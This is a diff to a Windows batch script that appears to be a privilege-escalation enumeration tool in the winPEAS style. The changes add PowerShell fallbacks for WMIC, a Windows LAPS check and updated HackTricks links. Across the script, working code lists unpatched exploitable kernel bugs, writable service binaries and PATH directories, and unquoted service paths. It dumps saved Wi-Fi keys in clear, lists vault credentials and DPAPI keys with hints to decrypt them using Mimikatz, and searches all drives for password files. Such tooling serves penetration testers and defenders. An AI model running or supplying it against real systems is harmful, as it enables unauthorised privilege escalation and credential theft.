+IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn 2>nul | findstr /C:"KB3143141" 1>NUL
 IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS16-032 patch is NOT installed! (Vulns: 2K8/SP1/2,Vista/SP2,7/SP1-secondary logon)
-IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB2393802" 1>NUL
+IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn 2>nul | findstr /C:"KB2393802" 1>NUL
 IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS11-011 patch is NOT installed! (Vulns: XP/SP2/3,2K3/SP2,2K8/SP2,Vista/SP1/2,7/SP0-WmiTraceMessageVa)
-IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB982799" 1>NUL
+IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn 2>nul | findstr /C:"KB982799" 1>NUL
 IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS10-59 patch is NOT installed! (Vulns: 2K8,Vista,7/SP0-Chimichurri)
-IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB979683" 1>NUL
+IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn 2>nul | findstr /C:"KB979683" 1>NUL
 IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS10-21 patch is NOT installed! (Vulns: 2K/SP4,XP/SP2/3,2K3/SP2,2K8/SP2,Vista/SP0/1/2,7/SP0-Win Kernel)
-IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB2305420" 1>NUL
+IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn 2>nul | findstr /C:"KB2305420" 1>NUL
 IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS10-092 patch is NOT installed! (Vulns: 2K8/SP0/1/2,Vista/SP1/2,7/SP0-Task Sched)
-IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB981957" 1>NUL
+IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn 2>nul | findstr /C:"KB981957" 1>NUL
 IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS10-073 patch is NOT installed! (Vulns: XP/SP2/3,2K3/SP2/2K8/SP2,Vista/SP1/2,7/SP0-Keyboard Layout)
-IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB4013081" 1>NUL
+IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn 2>nul | findstr /C:"KB4013081" 1>NUL
 IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS17-017 patch is NOT installed! (Vulns: 2K8/SP2,Vista/SP2,7/SP1-Registry Hive Loading)
-IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB977165" 1>NUL
+IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn 2>nul | findstr /C:"KB977165" 1>NUL
 IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS10-015 patch is NOT installed! (Vulns: 2K,XP,2K3,2K8,Vista,7-User Mode to Ring)
-IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB941693" 1>NUL
+IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn 2>nul | findstr /C:"KB941693" 1>NUL
 IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS08-025 patch is NOT installed! (Vulns: 2K/SP4,XP/SP2,2K3/SP1/2,2K8/SP0,Vista/SP0/1-win32k.sys)
-IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB920958" 1>NUL
+IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn 2>nul | findstr /C:"KB920958" 1>NUL
 IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS06-049 patch is NOT installed! (Vulns: 2K/SP4-ZwQuerySysInfo)
-IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB914389" 1>NUL
+IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn 2>nul | findstr /C:"KB914389" 1>NUL
 IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS06-030 patch is NOT installed! (Vulns: 2K,XP/SP2-Mrxsmb.sys)
-IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB908523" 1>NUL
+IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn 2>nul | findstr /C:"KB908523" 1>NUL
 IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS05-055 patch is NOT installed! (Vulns: 2K/SP4-APC Data-Free)
-IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB890859" 1>NUL
+IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn 2>nul | findstr /C:"KB890859" 1>NUL
 IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS05-018 patch is NOT installed! (Vulns: 2K/SP3/4,XP/SP1/2-CSRSS)
-IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB842526" 1>NUL
+IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn 2>nul | findstr /C:"KB842526" 1>NUL
 IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS04-019 patch is NOT installed! (Vulns: 2K/SP2/3/4-Utility Manager)
-IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB835732" 1>NUL
+IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn 2>nul | findstr /C:"KB835732" 1>NUL
 IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS04-011 patch is NOT installed! (Vulns: 2K/SP2/3/4,XP/SP0/1-LSASS service BoF)
-IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB841872" 1>NUL
+IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn 2>nul | findstr /C:"KB841872" 1>NUL
 IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS04-020 patch is NOT installed! (Vulns: 2K/SP4-POSIX)
-IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB2975684" 1>NUL
+IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn 2>nul | findstr /C:"KB2975684" 1>NUL
 IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS14-040 patch is NOT installed! (Vulns: 2K3/SP2,2K8/SP2,Vista/SP2,7/SP1-afd.sys Dangling Pointer)
-IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB3136041" 1>NUL
+IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn 2>nul | findstr /C:"KB3136041" 1>NUL
 IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS16-016 patch is NOT installed! (Vulns: 2K8/SP1/2,Vista/SP2,7/SP1-WebDAV to Address)
-IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB3057191" 1>NUL
+IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn 2>nul | findstr /C:"KB3057191" 1>NUL
 IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS15-051 patch is NOT installed! (Vulns: 2K3/SP2,2K8/SP2,Vista/SP2,7/SP1-win32k.sys)
-IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB2989935" 1>NUL
+IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn 2>nul | findstr /C:"KB2989935" 1>NUL
 IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS14-070 patch is NOT installed! (Vulns: 2K3/SP2-TCP/IP)
-IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB2778930" 1>NUL
+IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn 2>nul | findstr /C:"KB2778930" 1>NUL
 IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS13-005 patch is NOT installed! (Vulns: Vista,7,8,2008,2008R2,2012,RT-hwnd_broadcast)
-IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB2850851" 1>NUL
+IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn 2>nul | findstr /C:"KB2850851" 1>NUL
 IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS13-053 patch is NOT installed! (Vulns: 7SP0/SP1_x86-schlamperei)
-IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB2870008" 1>NUL
+IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn 2>nul | findstr /C:"KB2870008" 1>NUL
 IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS13-081 patch is NOT installed! (Vulns: 7SP0/SP1_x86-track_popup_menu)
 ECHO.
 CALL :T_Progress 2
@@ -147,12 +152,20 @@ ECHO.
 CALL :T_Progress 1
 
 :LAPSInstallCheck
-CALL :ColorLine " %E%33m[+]%E%97m LAPS installed?"
+CALL :ColorLine " %E%33m[+]%E%97m Legacy Microsoft LAPS installed?"
 ECHO.   [i] Check what is being logged
 REG QUERY "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft Services\AdmPwd" /v AdmPwdEnabled 2>nul
 ECHO.
 CALL :T_Progress 1
 
+:WindowsLAPSInstallCheck
+CALL :ColorLine " %E%33m[+]%E%97m Windows LAPS installed?"
+ECHO.   [i] Check what is being logged: 0x00 Disabled, 0x01 Backup to Entra, 0x02 Backup to Active Directory
+REG QUERY "HKEY_LOCAL_MACHINE\Software\Microsoft\Policies\LAPS" /v BackupDirectory 2>nul
+REG QUERY "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\LAPS" /v BackupDirectory 2>nul
+ECHO.
+CALL :T_Progress 1
+
 :LSAProtectionCheck
 CALL :ColorLine " %E%33m[+]%E%97m LSA protection?"
 ECHO.   [i] Active if "1"
@@ -182,14 +195,19 @@ CALL :T_Progress 1
 :UACSettings
 CALL :ColorLine " %E%33m[+]%E%97m UAC Settings"
 ECHO.   [i] If the results read ENABLELUA REG_DWORD 0x1, part or all of the UAC components are on
-ECHO.   [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#basic-uac-bypass-full-file-system-access
+ECHO.   [?] https://book.hacktricks.wiki/en/windows-hardening/authentication-credentials-uac-and-efs/uac-user-account-control.html#very-basic-uac-bypass-full-file-system-access
 REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA 2>nul
 ECHO.
 CALL :T_Progress 1
 
 :AVSettings
 CALL :ColorLine " %E%33m[+]%E%97m Registered Anti-Virus(AV)"
-WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List | more 
+where wmic >nul 2>&1
+if %errorlevel% equ 0 (
+    WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List | more
+) else (
+    powershell -command "Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntiVirusProduct | Select-Object -ExpandProperty displayName"
+) 
 ECHO.Checking for defender whitelisted PATHS
 reg query "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" 2>nul
 CALL :T_Progress 1
@@ -218,7 +236,12 @@ CALL :T_Progress 3
 :MountedDisks
 CALL :ColorLine " %E%33m[+]%E%97m MOUNTED DISKS"
 ECHO.   [i] Maybe you find something interesting
-(wmic logicaldisk get caption 2>nul | more) || (fsutil fsinfo drives 2>nul)
+where wmic >nul 2>&1
+if %errorlevel% equ 0 (
+    wmic logicaldisk get caption | more
+) else (
+    fsutil fsinfo drives
+)
 ECHO.
 CALL :T_Progress 1
 
@@ -233,7 +256,7 @@ CALL :T_Progress 1
 :InstalledSoftware
 CALL :ColorLine " %E%33m[+]%E%97m INSTALLED SOFTWARE"
 ECHO.   [i] Some weird software? Check for vulnerabilities in unknow software installed
-ECHO.   [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#software
+ECHO.   [?] https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#applications
 ECHO.
 dir /b "C:\Program Files" "C:\Program Files (x86)" | sort
 reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall /s | findstr InstallLocation | findstr ":\\"
@@ -244,7 +267,7 @@ CALL :T_Progress 2
 
 :RemodeDeskCredMgr
 CALL :ColorLine " %E%33m[+]%E%97m Remote Desktop Credentials Manager"
-ECHO.   [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#remote-desktop-credential-manager
+ECHO.   [?] https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#remote-desktop-credential-manager
 IF exist "%LOCALAPPDATA%\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings" ECHO.Found: RDCMan.settings in %AppLocal%\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings, check for credentials in .rdg files
 ECHO.
 CALL :T_Progress 1
@@ -252,7 +275,7 @@ CALL :T_Progress 1
 :WSUS
 CALL :ColorLine " %E%33m[+]%E%97m WSUS"
 ECHO.   [i] You can inject 'fake' updates into non-SSL WSUS traffic (WSUXploit)
-ECHO.   [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#wsus
+ECHO.   [?] https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#wsus
 reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WindowsUpdate\ 2>nul | findstr /i "wuserver" | findstr /i "http://"
 ECHO.
 CALL :T_Progress 1
@@ -260,20 +283,34 @@ CALL :T_Progress 1
 :RunningProcesses
 CALL :ColorLine " %E%33m[+]%E%97m RUNNING PROCESSES"
 ECHO.   [i] Something unexpected is running? Check for vulnerabilities
-ECHO.   [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#running-processes
+ECHO.   [?] https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#running-processes
 tasklist /SVC
 ECHO.
 CALL :T_Progress 2
 ECHO.   [i] Checking file permissions of running processes (File backdooring - maybe the same files start automatically when Administrator logs in)
-for /f "tokens=2 delims='='" %%x in ('wmic process list full^|find /i "executablepath"^|find /i /v "system32"^|find ":"') do (
+where wmic >nul 2>&1
-	for /f eol^=^"^ delims^=^" %%z in ('ECHO.%%x') do (
+if %errorlevel% equ 0 (
-		icacls "%%z" 2>nul | findstr /i "(F) (M) (W) :\\" | findstr /i ":\\ everyone authenticated users todos %username%" && ECHO.
+	for /f "tokens=2 delims='='" %%x in ('wmic process list full ^|find /i "executablepath"^|find /i /v "system32"^|find ":"') do (
+		for /f eol^=^"^ delims^=^" %%z in ('ECHO.%%x') do (
+			icacls "%%z" 2>nul | findstr /i "(F) (M) (W) :\\" | findstr /i ":\\ everyone authenticated users todos %username%" && ECHO.
+		)
+	)
+) else (
+	for /f "tokens=*" %%x in ('powershell -command "Get-Process | Where-Object {$_.Path -and $_.Path -notlike '*system32*'} | Select-Object -ExpandProperty Path -Unique"') do (
+		icacls "%%x" 2>nul | findstr /i "(F) (M) (W) :\\" | findstr /i ":\\ everyone authenticated users todos %username%" && ECHO.
 	)
 )
 ECHO.
 ECHO.   [i] Checking directory permissions of running processes (DLL injection)
-for /f "tokens=2 delims='='" %%x in ('wmic process list full^|find /i "executablepath"^|find /i /v "system32"^|find ":"') do for /f eol^=^"^ delims^=^" %%y in ('ECHO.%%x') do (
+where wmic >nul 2>&1
-	icacls "%%~dpy\" 2>nul | findstr /i "(F) (M) (W) :\\" | findstr /i ":\\ everyone authenticated users todos %username%" && ECHO.
+if %errorlevel% equ 0 (
+	for /f "tokens=2 delims='='" %%x in ('wmic process list full ^|find /i "executablepath"^|find /i /v "system32"^|find ":"') do for /f eol^=^"^ delims^=^" %%y in ('ECHO.%%x') do (
+		icacls "%%~dpy\" 2>nul | findstr /i "(F) (M) (W) :\\" | findstr /i ":\\ everyone authenticated users todos %username%" && ECHO.
+	)
+) else (
+	for /f "tokens=*" %%x in ('powershell -command "Get-Process | Where-Object {$_.Path -and $_.Path -notlike '*system32*'} | Select-Object -ExpandProperty Path -Unique"') do (
+		for /f "delims=" %%d in ("%%~dpx") do icacls "%%d" 2>nul | findstr /i "(F) (M) (W) :\\" | findstr /i ":\\ everyone authenticated users todos %username%" && ECHO.
+	)
 )
 ECHO.
 CALL :T_Progress 3
@@ -281,7 +318,7 @@ CALL :T_Progress 3
 :RunAtStartup
 CALL :ColorLine " %E%33m[+]%E%97m RUN AT STARTUP"
 ECHO.   [i] Check if you can modify any binary that is going to be executed by admin or if you can impersonate a not found binary
-ECHO.   [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#run-at-startup
+ECHO.   [?] https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#run-at-startup
 ::(autorunsc.exe -m -nobanner -a * -ct /accepteula 2>nul || wmic startup get caption,command 2>nul | more & ^
 reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run 2>nul & ^
 reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce 2>nul & ^
@@ -305,7 +342,7 @@ CALL :T_Progress 2
 :AlwaysInstallElevated
 CALL :ColorLine " %E%33m[+]%E%97m AlwaysInstallElevated?"
 ECHO.   [i] If '1' then you can install a .msi file with admin privileges ;)
-ECHO.   [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#alwaysinstallelevated
+ECHO.   [?] https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#alwaysinstallelevated-1
 reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated 2> nul
 reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated 2> nul
 ECHO.
@@ -363,13 +400,13 @@ CALL :T_Progress 1
 
 :WifiCreds
 CALL :ColorLine " %E%33m[+]%E%97m WIFI"
-for /f "tokens=3,* delims=: " %%a in ('netsh wlan show profiles ^| find "Profile "') do (netsh wlan show profiles name=%%b key=clear | findstr "SSID Cipher Content" | find /v "Number" & ECHO.)
+for /f "tokens=4 delims=: " %%a in ('netsh wlan show profiles ^| find "Profile "') do (netsh wlan show profiles name=%%a key=clear | findstr "SSID Cipher Content" | find /v "Number" & ECHO.)
 CALL :T_Progress 1
 
 :BasicUserInfo
 CALL :ColorLine "%E%32m[*]%E%97m BASIC USER INFO
 ECHO.   [i] Check if you are inside the Administrators group or if you have enabled any token that can be use to escalate privileges like SeImpersonatePrivilege, SeAssignPrimaryPrivilege, SeTcbPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeCreateTokenPrivilege, SeLoadDriverPrivilege, SeTakeOwnershipPrivilege, SeDebbugPrivilege
-ECHO.   [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#users-and-groups
+ECHO.   [?] https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#users--groups
 ECHO.
 CALL :ColorLine " %E%33m[+]%E%97m CURRENT USER"
 net user %username%
@@ -443,16 +480,27 @@ ECHO.
 
 :ServiceBinaryPermissions
 CALL :ColorLine " %E%33m[+]%E%97m SERVICE BINARY PERMISSIONS WITH WMIC and ICACLS"
-ECHO.   [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#services
+ECHO.   [?] https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#services
-for /f "tokens=2 delims='='" %%a in ('cmd.exe /c wmic service list full ^| findstr /i "pathname" ^|findstr /i /v "system32"') do (
+where wmic >nul 2>&1
-    for /f eol^=^"^ delims^=^" %%b in ("%%a") do icacls "%%b" 2>nul | findstr /i "(F) (M) (W) :\\" | findstr /i ":\\ everyone authenticated users todos usuarios %username%" && ECHO.
+if %errorlevel% equ 0 (
+	for /f "tokens=2 delims='='" %%a in ('cmd.exe /c wmic service list full ^| findstr /i "pathname" ^|findstr /i /v "system32"') do (
+		for /f eol^=^"^ delims^=^" %%b in ("%%a") do icacls "%%b" 2>nul | findstr /i "(F) (M) (W) :\\" | findstr /i ":\\ everyone authenticated users todos usuarios %username%" && ECHO.
+	)
+) else (
+	for /f "tokens=*" %%a in ('powershell -command "Get-CimInstance -ClassName Win32_Service | Where-Object {$_.PathName -and $_.PathName -notlike '*system32*'} | Select-Object -ExpandProperty PathName"') do (
+		for /f "tokens=1 delims= " %%b in ("%%a") do (
+			set "svcpath=%%b"
+			set "svcpath=!svcpath:~1,-1!"
+			if exist "!svcpath!" icacls "!svcpath!" 2>nul | findstr /i "(F) (M) (W) :\\" | findstr /i ":\\ everyone authenticated users todos usuarios %username%" && ECHO.
+		)
+	)
 )
 ECHO.
 CALL :T_Progress 1
 
 :CheckRegistryModificationAbilities
 CALL :ColorLine " %E%33m[+]%E%97m CHECK IF YOU CAN MODIFY ANY SERVICE REGISTRY"
-ECHO.   [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#services
+ECHO.   [?] https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#services
 for /f %%a in ('reg query hklm\system\currentcontrolset\services') do del %temp%\reg.hiv >nul 2>&1 & reg save %%a %temp%\reg.hiv >nul 2>&1 && reg restore %%a %temp%\reg.hiv >nul 2>&1 && ECHO.You can modify %%a
 ECHO.
 CALL :T_Progress 1
@@ -461,7 +509,7 @@ CALL :T_Progress 1
 CALL :ColorLine " %E%33m[+]%E%97m UNQUOTED SERVICE PATHS"
 ECHO.   [i] When the path is not quoted (ex: C:\Program files\soft\new folder\exec.exe) Windows will try to execute first 'C:\Program.exe', then 'C:\Program Files\soft\new.exe' and finally 'C:\Program Files\soft\new folder\exec.exe'. Try to create 'C:\Program Files\soft\new.exe'
 ECHO.   [i] The permissions are also checked and filtered using icacls
-ECHO.   [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#services
+ECHO.   [?] https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#services
 for /f "tokens=2" %%n in ('sc query state^= all^| findstr SERVICE_NAME') do (
 	for /f "delims=: tokens=1*" %%r in ('sc qc "%%~n" ^| findstr BINARY_PATH_NAME ^| findstr /i /v /l /c:"c:\windows\system32" ^| findstr /v /c:""""') do (
 		ECHO.%%~s ^| findstr /r /c:"[a-Z][ ][a-Z]" >nul 2>&1 && (ECHO.%%n && ECHO.%%~s && icacls %%s | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%") && ECHO.
@@ -476,7 +524,7 @@ ECHO.
 CALL :ColorLine "%E%32m[*]%E%97m DLL HIJACKING in PATHenv variable"
 ECHO.   [i] Maybe you can take advantage of modifying/creating some binary in some of the following locations
 ECHO.   [i] PATH variable entries permissions - place binary or DLL to execute instead of legitimate
-ECHO.   [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#dll-hijacking
+ECHO.   [?] https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#dll-hijacking
 for %%A in ("%path:;=";"%") do ( cmd.exe /c icacls "%%~A" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && ECHO. )
 ECHO.
 CALL :T_Progress 1
@@ -485,7 +533,7 @@ CALL :T_Progress 1
 CALL :ColorLine "%E%32m[*]%E%97m CREDENTIALS"
 ECHO.
 CALL :ColorLine " %E%33m[+]%E%97m WINDOWS VAULT"
-ECHO.   [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#windows-vault
+ECHO.   [?] https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#credentials-manager--windows-vault
 cmdkey /list
 ECHO.
 CALL :T_Progress 2
@@ -493,14 +541,14 @@ CALL :T_Progress 2
 :DPAPIMasterKeys
 CALL :ColorLine " %E%33m[+]%E%97m DPAPI MASTER KEYS"
 ECHO.   [i] Use the Mimikatz 'dpapi::masterkey' module with appropriate arguments (/rpc) to decrypt
-ECHO.   [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#dpapi
+ECHO.   [?] https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#dpapi
 powershell -command "Get-ChildItem %appdata%\Microsoft\Protect" 2>nul
 powershell -command "Get-ChildItem %localappdata%\Microsoft\Protect" 2>nul
 CALL :T_Progress 2
 CALL :ColorLine " %E%33m[+]%E%97m DPAPI MASTER KEYS"
 ECHO.   [i] Use the Mimikatz 'dpapi::cred' module with appropriate /masterkey to decrypt
 ECHO.   [i] You can also extract many DPAPI masterkeys from memory with the Mimikatz 'sekurlsa::dpapi' module
-ECHO.   [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#dpapi
+ECHO.   [?] https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#dpapi
 ECHO.
 ECHO.Looking inside %appdata%\Microsoft\Credentials\
 ECHO.
@@ -573,7 +621,7 @@ CALL :T_Progress 2
 
 :AppCMD
 CALL :ColorLine " %E%33m[+]%E%97m AppCmd"
-ECHO.   [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#appcmd.exe
+ECHO.   [?] https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#appcmdexe
 IF EXIST %systemroot%\system32\inetsrv\appcmd.exe ECHO.%systemroot%\system32\inetsrv\appcmd.exe exists. 
 ECHO.
 CALL :T_Progress 2
@@ -581,7 +629,7 @@ CALL :T_Progress 2
 :RegFilesCredentials
 CALL :ColorLine " %E%33m[+]%E%97m Files in registry that may contain credentials"
 ECHO.   [i] Searching specific files that may contains credentials.
-ECHO.   [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#credentials-inside-files
+ECHO.   [?] https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#files-and-registry-credentials
 ECHO.Looking inside HKCU\Software\ORL\WinVNC3\Password
 reg query HKCU\Software\ORL\WinVNC3\Password 2>nul
 CALL :T_Progress 2
@@ -620,16 +668,29 @@ if "%long%" == "true" (
 	ECHO.
 	ECHO.   [i] Iterating through the drives
 	ECHO.
-	for /f %%x in ('wmic logicaldisk get name^| more') do (
+	where wmic >nul 2>&1
-		set tdrive=%%x
+	if !errorlevel! equ 0 (
-		if "!tdrive:~1,2!" == ":" (
+		for /f %%x in ('wmic logicaldisk get name ^| more') do (
-			%%x
+			set tdrive=%%x
-            CALL :ColorLine " %E%33m[+]%E%97m FILES THAT CONTAINS THE WORD PASSWORD WITH EXTENSION: .xml .ini .txt *.cfg *.config"
+			if "!tdrive:~1,2!" == ":" (
-	        findstr /s/n/m/i password *.xml *.ini *.txt *.cfg *.config 2>nul | findstr /v /i "\\AppData\\Local \\WinSxS ApnDatabase.xml \\UEV\\InboxTemplates \\Microsoft.Windows.Cloud \\Notepad\+\+\\ vmware cortana alphabet \\7-zip\\" 2>nul
+				%%x
-            ECHO.
+				CALL :ColorLine " %E%33m[+]%E%97m FILES THAT CONTAINS THE WORD PASSWORD WITH EXTENSION: .xml .ini .txt *.cfg *.config"
-            CALL :ColorLine " %E%33m[+]%E%97m FILES WHOSE NAME CONTAINS THE WORD PASS CRED or .config not inside \Windows\"
+				findstr /s/n/m/i password *.xml *.ini *.txt *.cfg *.config 2>nul | findstr /v /i "\\AppData\\Local \\WinSxS ApnDatabase.xml \\UEV\\InboxTemplates \\Microsoft.Windows.Cloud \\Notepad\+\+\\ vmware cortana alphabet \\7-zip\\" 2>nul
-            dir /s/b *pass* == *cred* == *.config* == *.cfg 2>nul | findstr /v /i "\\windows\\"  
+				ECHO.
-            ECHO.
+				CALL :ColorLine " %E%33m[+]%E%97m FILES WHOSE NAME CONTAINS THE WORD PASS CRED or .config not inside \Windows\"
+				dir /s/b *pass* == *cred* == *.config* == *.cfg 2>nul | findstr /v /i "\\windows\\"
+				ECHO.
+			)
+		)
+	) else (
+		for /f %%x in ('powershell -command "Get-PSDrive -PSProvider FileSystem | Where-Object {$_.Root -match ':'} | Select-Object -ExpandProperty Name"') do (
+			%%x:
+			CALL :ColorLine " %E%33m[+]%E%97m FILES THAT CONTAINS THE WORD PASSWORD WITH EXTENSION: .xml .ini .txt *.cfg *.config"
+			findstr /s/n/m/i password *.xml *.ini *.txt *.cfg *.config 2>nul | findstr /v /i "\\AppData\\Local \\WinSxS ApnDatabase.xml \\UEV\\InboxTemplates \\Microsoft.Windows.Cloud \\Notepad\+\+\\ vmware cortana alphabet \\7-zip\\" 2>nul
+			ECHO.
+			CALL :ColorLine " %E%33m[+]%E%97m FILES WHOSE NAME CONTAINS THE WORD PASS CRED or .config not inside \Windows\"
+			dir /s/b *pass* == *cred* == *.config* == *.cfg 2>nul | findstr /v /i "\\windows\\"
+			ECHO.
 		)
 	)
 	CALL :T_Progress 2
@@ -646,7 +707,8 @@ EXIT /B
 
 :SetOnce
 REM :: ANSI escape character is set once below - for ColorLine Subroutine
-SET "E=0x1B["
+for /F %%a in ('echo prompt $E ^| cmd') do set "ESC=%%a"
+SET "E=%ESC%["
